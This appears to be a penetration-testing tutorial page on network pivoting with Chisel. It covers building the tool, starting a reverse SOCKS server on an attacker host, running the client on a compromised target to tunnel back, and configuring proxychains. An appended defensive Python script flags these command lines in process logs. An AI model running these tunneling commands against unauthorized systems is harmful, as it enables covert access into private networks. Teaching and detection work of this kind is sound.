Chisel

Master Tunneling

The methods discussed in the previous sections are either restricted to creating a pivot to a single port/service, or they create dynamic port forwarding with proxychains and SSH only when the intermediate (compromised) machine is a Linux machine.

Chisel comes in handy when the intermediate system is Windows, and it works equally well with a Linux system.

Building Chisel

Chisel's source code is available on GitHub and can be downloaded and compiled for Windows or Linux. Here are the steps to build Chisel.

Clone the Chisel repository from the following link,

sudo git clone https://github.com/jpillora/chisel.git /opt/chisel
cd /opt/chisel

Next, we compile it for Windows using Go. If you don't have Go, you can use the following link to get it installed,

Use the following command to create an executable,

GOOS=windows GOARCH=amd64 go build -ldflags="-s -w" .

Next, we can use Go again to build for Linux using the following command,

go build -ldflags="-s -w" .

Download Binary

If you have trouble building it yourself, the executables can be downloaded from the following link,

Creating a Tunnel

The following commands create dynamic port forwarding, meaning that with this tunnel you will be able to access any system and any port through proxychains and Chisel.

On the attacker system (Kali),

./chisel server -p 8080 --socks5 --reverse

Don't forget to transfer the binary to the target system, then run the client there,

chisel client 192.168.49.100:8080 R:socks

Make the following changes in the proxychains config file, which is located at "/etc/proxychains.conf" or "/etc/proxychains4.conf" (the config filename can differ depending on the version),

[ProxyList]
socks5 127.0.0.1 1080

Now you can test connecting to any system that you like using proxychains,

proxychains -q telnet 192.178.100.100 80
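
From the defender's side, the server and client invocations above leave a recognizable shape in process-creation logs. The following is an added example, not part of the original page or the Chisel project: it flags that shape by argument pattern over constructed sample events, and the function names, labels and the renamed-binary path are assumptions.

```python
import re
import shlex

# "<host>:<port>" (optionally with http(s)://), the server argument of the client command
SERVER_RE = re.compile(r"^(?:https?://)?[\w.-]+:\d{1,5}$")

def classify(cmdline):
    """Return a finding label for a Chisel-style command line, else None.

    Matches on argument shape rather than the executable name, so a
    binary that was renamed before transfer is still flagged.
    """
    try:
        args = shlex.split(cmdline, posix=False)  # keeps Windows backslashes
    except ValueError:                            # unbalanced quotes in the log
        args = cmdline.split()
    args = [a.strip("\"'") for a in args]
    for i, tok in enumerate(args[1:], start=1):
        rest = args[i + 1:]
        if tok == "client":
            reverse = [a for a in rest if a.startswith("R:")]
            has_server = any(SERVER_RE.match(a) for a in rest)
            if reverse and has_server:
                socks = any(a.endswith("socks") for a in reverse)
                return "reverse-socks-client" if socks else "reverse-port-client"
        if tok == "server" and "--reverse" in rest:
            return "reverse-server"
    return None

def scan(events):
    """events: iterable of (host, cmdline); returns [(host, label)] for hits."""
    hits = []
    for host, cmdline in events:
        label = classify(cmdline)
        if label:
            hits.append((host, label))
    return hits

# Constructed sample events (hostnames and the renamed path are made up).
SAMPLE = [
    ("kali", "./chisel server -p 8080 --socks5 --reverse"),
    ("ws01", "chisel client 192.168.49.100:8080 R:socks"),
    ("ws02", r"C:\Users\Public\updater.exe client 192.168.49.100:8080 R:socks"),
    ("ws03", "ssh -p 8080 admin@192.168.49.100"),
]

if __name__ == "__main__":
    for host, label in scan(SAMPLE):
        print(host, label)
```
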
